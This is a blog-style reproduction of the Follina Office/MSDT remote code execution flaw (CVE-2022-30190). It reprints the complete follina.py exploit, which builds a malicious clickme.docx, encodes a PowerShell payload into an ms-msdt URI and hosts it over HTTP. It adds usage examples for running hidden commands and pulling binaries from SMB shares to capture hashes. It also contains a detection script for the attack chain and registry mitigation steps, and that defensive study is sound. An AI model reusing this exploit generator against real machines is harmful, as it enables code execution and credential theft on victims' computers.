Microsoft Office MSDT Code Execution Vulnerability (CVE-2022-30190) vulnerability reproduction
2022-06-12 17:00:00 【two8】
Disclaimer:
This article is for study and research only. Using its content to carry out illegal operations against other Internet applications is strictly prohibited; if it is used for illegal purposes, the consequences are borne by you and any resulting risk is unrelated to the author of this article. By continuing to read, you are deemed to accept these terms.
CVE-2022-30190 vulnerability reproduction
Vulnerability summary:
This vulnerability was first observed on May 27, 2022, in a sample uploaded from a Belarusian IP address. The malicious document uses Word's remote template feature to retrieve an HTML file from a remote web server, and that HTML uses the ms-msdt MSProtocol URI scheme to execute malicious PowerShell code. The infection chain abuses the Windows program msdt.exe, which runs the various Windows troubleshooting packs; a malicious document can invoke it without any user interaction. As a result, even when macros are disabled, a malicious document can still execute arbitrary PowerShell code through the 'ms-msdt' URI.
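The delivery chain in the summary has two observable stages: a relationship inside the .docx that makes Word fetch remote content when the file is opened, and an ms-msdt: URI inside the fetched HTML. The following triage script is an added example written for this page; it is not part of the original write-up and not code from the follina.py project. It unzips a document, lists every external-target relationship under word/_rels, flags the relationship types Word resolves automatically (attachedTemplate, oleObject, frame, subDocument) when their target is remote, and scans any retrieved HTML for ms-msdt: URIs. The sample document and HTML are constructed inline; attacker.invalid and PLACEHOLDER are placeholders, not values from the page.

```python
"""Triage a .docx for the CVE-2022-30190 delivery chain (added example)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % RELS_NS
# Relationship types Word resolves on open, i.e. no click is needed.
AUTO_LOAD_TYPES = ("/attachedTemplate", "/oleObject", "/frame", "/subDocument")
# Target prefixes that reach outside the document package.
REMOTE_SCHEMES = ("http://", "https://", "file://", "\\\\")
# An ms-msdt: URI up to the quote or tag that terminates it; scheme is case-insensitive.
MSDT_URI = re.compile(r"ms-msdt:[^\"'<>]*", re.IGNORECASE)


def external_relationships(docx_bytes):
    """(part, id, type, target) for every TargetMode="External" relationship under word/."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            for rel in ET.fromstring(zf.read(name)).iter(REL_TAG):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append((name, rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")))
    return found


def suspicious_relationships(docx_bytes):
    """Keep only auto-loaded relationship types with a remote target.
    Plain hyperlinks are external too but require a click, so they are not flagged."""
    flagged = []
    for part, rid, rtype, target in external_relationships(docx_bytes):
        if rtype.endswith(AUTO_LOAD_TYPES) and target.lower().startswith(REMOTE_SCHEMES):
            flagged.append((part, rid, rtype.rsplit("/", 1)[-1], target))
    return flagged


def msdt_uris(text):
    """Every ms-msdt: URI found in fetched HTML (or any other text)."""
    return MSDT_URI.findall(text)


def triage(docx_bytes, fetched_html=None):
    """'remote-load' if the document reaches out on open; 'follina-chain' if the
    fetched content additionally carries an ms-msdt: URI; otherwise 'clean'."""
    rels = suspicious_relationships(docx_bytes)
    uris = msdt_uris(fetched_html) if fetched_html else []
    verdict = "follina-chain" if rels and uris else "remote-load" if rels else "clean"
    return {"verdict": verdict, "relationships": rels, "msdt_uris": uris}


def build_sample_docx(include_remote=True):
    """Constructed minimal .docx: a styles part, a hyperlink and, optionally,
    an external OLE object pointing at a placeholder host."""
    remote = ('<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
              'Target="http://attacker.invalid/exploit.html" TargetMode="External"/>') if include_remote else ""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
            'Target="https://example.com/" TargetMode="External"/>'
            + remote + '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed stand-in for the fetched HTML; the real payload string is not reproduced here.
SAMPLE_HTML = ('<html><body><script>window.location.href = '
               '"ms-msdt:/id PCWDiagnostic /skip force /param IT_BrowseForFile=PLACEHOLDER";'
               '</script></body></html>')

if __name__ == "__main__":
    print(triage(build_sample_docx(), SAMPLE_HTML))
    print(triage(build_sample_docx(include_remote=False)))
```

Run the module directly to see the verdict for the constructed sample; pass real bytes read from a suspect .docx and the body of the HTML it references to `triage` for live use.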
Affected versions:
The currently known affected versions are:
Office 2021 LTS
Office 2019
Office 2016
Office 2013
Office ProPlus
Office 365
Vulnerability reproduction:
Use the PoC that has been published online:
https://github.com/chvancooten/follina.py
#!/usr/bin/env python3
import argparse
import os
import zipfile
import http.server
import socketserver
import base64

# Helper function to zip whole dir
# https://stackoverflow.com/questions/1855095/how-to-create-a-zip-archive-of-a-directory
def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            os.utime(os.path.join(root, file), (1653895859, 1653895859))
            ziph.write(os.path.join(root, file),
                       os.path.relpath(
                           os.path.join(root, file),
                           path
                       ))

if __name__ == "__main__":
    # Parse arguments
    parser = argparse.ArgumentParser()
    required = parser.add_argument_group('Required Arguments')
    binary = parser.add_argument_group('Binary Execution Arguments')
    command = parser.add_argument_group('Command Execution Arguments')
    optional = parser.add_argument_group('Optional Arguments')
    required.add_argument('-m', '--mode', action='store', dest='mode', choices={"binary", "command"},
                          help='Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command', required=True)
    binary.add_argument('-b', '--binary', action='store', dest='binary',
                        help='The full path of the binary to run. Can be local or remote from an SMB share')
    command.add_argument('-c', '--command', action='store', dest='command',
                         help='The encoded command to execute in "command" mode')
    optional.add_argument('-u', '--url', action='store', dest='url', default='localhost',
                          help='The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"')
    optional.add_argument('-H', '--host', action='store', dest='host', default="0.0.0.0",
                          help='The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)')
    optional.add_argument('-P', '--port', action='store', dest='port', default=80, type=int,
                          help='The port to run the HTTP server on, defaults to 80')
    args = parser.parse_args()

    if args.mode == "binary" and args.binary is None:
        raise SystemExit("Binary mode requires a binary to be specified, e.g. -b '\\\\localhost\\c$\\Windows\\System32\\calc.exe'")
    if args.mode == "command" and args.command is None:
        raise SystemExit("Command mode requires a command to be specified, e.g. -c 'c:\\windows\\system32\\cmd.exe /c whoami > c:\\users\\public\\pwned.txt'")

    payload_url = f"http://{args.url}:{args.port}/exploit.html"

    if args.mode == "command":
        # Original PowerShell execution variant
        command = args.command.replace("\"", "\\\"")
        encoded_command = base64.b64encode(bytearray(command, 'utf-16-le')).decode('UTF-8')  # Powershell life...
        payload = fr'''"ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{encoded_command}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""'''

    if args.mode == "binary":
        # John Hammond binary variant
        binary_path = args.binary.replace('\\', '\\\\').rstrip('.exe')
        payload = fr'"ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$({binary_path})/.exe\""'

    # Prepare the doc file
    with open("src/document.xml.rels.tpl", "r") as f:
        tmp = f.read()
    payload_rels = tmp.format(payload_url=payload_url)

    if not os.path.exists("src/clickme/word/_rels"):
        os.makedirs("src/clickme/word/_rels")
    with open("src/clickme/word/_rels/document.xml.rels", "w") as f:
        f.write(payload_rels)

    with zipfile.ZipFile('clickme.docx', 'w', zipfile.ZIP_DEFLATED) as zipf:
        zipdir('src/clickme/', zipf)
    print("Generated 'clickme.docx' in current directory")

    # Prepare the HTML payload
    if not os.path.exists("www"):
        os.makedirs("www")
    with open("src/exploit.html.tpl", "r") as f:
        tmp = f.read()
    payload_html = tmp.format(payload=payload)
    with open("www/exploit.html", "w") as f:
        f.write(payload_html)
    print("Generated 'exploit.html' in 'www' directory")

    # Host the payload
    class Handler(http.server.SimpleHTTPRequestHandler):
        def __init__(self, *args, **kwargs):
            super().__init__(*args, directory="www", **kwargs)

    print(f"Serving payload on {payload_url}")
    with socketserver.TCPServer((args.host, args.port), Handler) as httpd:
        httpd.serve_forever()
Usage:
python .\follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] [-u URL] [-H HOST] [-p PORT]
options:
-h, --help show this help message and exit
Required Arguments:
-m {command,binary}, --mode {command,binary}
Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command
Binary Execution Arguments:
-b BINARY, --binary BINARY
Command Execution Arguments:
-c COMMAND, --command COMMAND
The encoded command to execute in "command" mode
Optional Arguments:
-u URL, --url URL The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
-H HOST, --host HOST The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
-p PORT, --port PORT The port to run the HTTP server on, defaults to 80
Examples:
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe
# Execute a binary from a file share (can be used to farm hashes)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe
# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"
# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4
# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080
Exploitation:
Office download address:
https://otp.landian.vip/zh-cn/download.html
Because I am reproducing this in a virtual machine, I use the fifth example, which lets the document load my HTML remotely:
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4


Put the generated document into the virtual machine and open it; the reproduction succeeds.

Remediation advice:
Disabling the MSDT URL protocol prevents troubleshooters from being launched as links, including links throughout the operating system. Troubleshooters can still be reached through the Get Help application and as other or additional troubleshooters in system settings. Follow these steps to disable it:
Run Command Prompt as Administrator.
To back up the registry key, run the command "reg export HKEY_CLASSES_ROOT\ms-msdt filename".
Run the command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f".
How to undo the workaround:
Run Command Prompt as Administrator.
To restore the registry key, run the command "reg import filename".
References:
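The workaround above is three reg.exe commands, and the part that goes wrong in practice is ordering and verification: deleting before the export succeeded, or not checking afterwards that the handler is really gone. The script below is an added example for this page, not code from the original post or from Microsoft; it sequences exactly the export, delete and import commands listed above, refuses to delete the key unless the backup was written, and parses `reg query` output to confirm the handler state before and after. The reg.exe calls only run on Windows; the parsing and command-building helpers are pure so they can be checked anywhere. The backup path and the sample `reg query` output are constructed for illustration.

```python
"""Apply, verify and undo the ms-msdt URL handler workaround (added example)."""
import subprocess
import sys

MSDT_KEY = r"HKEY_CLASSES_ROOT\ms-msdt"


def handler_registered(returncode, query_output):
    """Interpret the result of 'reg query' on the ms-msdt key: exit code 0 plus a
    line naming the key means the ms-msdt: URL handler is still registered.
    A non-zero exit (key not found) means the workaround is in effect."""
    if returncode != 0:
        return False
    return any(line.strip().lower().startswith(MSDT_KEY.lower())
               for line in query_output.splitlines())


def mitigation_commands(backup_path):
    """The workaround's command sequence, backup first: export, then delete.
    '/y' makes reg export overwrite an existing backup file without prompting."""
    return [
        ["reg", "export", MSDT_KEY, backup_path, "/y"],
        ["reg", "delete", MSDT_KEY, "/f"],
    ]


def rollback_commands(backup_path):
    """Undo the workaround by re-importing the exported key."""
    return [["reg", "import", backup_path]]


def run(argv):
    """Run one reg.exe command and return (exit code, combined output)."""
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.returncode, proc.stdout + proc.stderr


def handler_present():
    """Live check of the current machine (Windows only)."""
    rc, out = run(["reg", "query", MSDT_KEY])
    return handler_registered(rc, out)


def apply_workaround(backup_path):
    """Returns True when the handler is absent afterwards. Stops at the first
    failing command, so the key is never deleted without a backup to restore from."""
    if not handler_present():
        return True  # already mitigated, nothing to do
    for argv in mitigation_commands(backup_path):
        rc, out = run(argv)
        if rc != 0:
            raise RuntimeError(f"{' '.join(argv)} failed: {out.strip()}")
    return not handler_present()


def undo_workaround(backup_path):
    """Re-import the backup; returns True when the handler is registered again."""
    for argv in rollback_commands(backup_path):
        rc, out = run(argv)
        if rc != 0:
            raise RuntimeError(f"{' '.join(argv)} failed: {out.strip()}")
    return handler_present()


if __name__ == "__main__":
    if sys.platform != "win32":
        raise SystemExit("reg.exe is only available on Windows; run from an elevated prompt there")
    # Placeholder backup location; pass your own path as the second argument.
    backup = sys.argv[2] if len(sys.argv) > 2 else r"C:\ms-msdt-backup.reg"
    if len(sys.argv) > 1 and sys.argv[1] == "undo":
        print("handler registered after restore:", undo_workaround(backup))
    else:
        print("handler removed:", apply_workaround(backup))
```

Run it from an elevated Command Prompt as `python msdt_workaround.py apply C:\path\backup.reg` to disable the handler and `python msdt_workaround.py undo C:\path\backup.reg` to restore it; both print the verified end state rather than assuming the commands succeeded.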
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
https://www.t00ls.com/thread-65967-1-1.html
https://mp.weixin.qq.com/s/GjFG93PFROwbe8P1rtX6Qg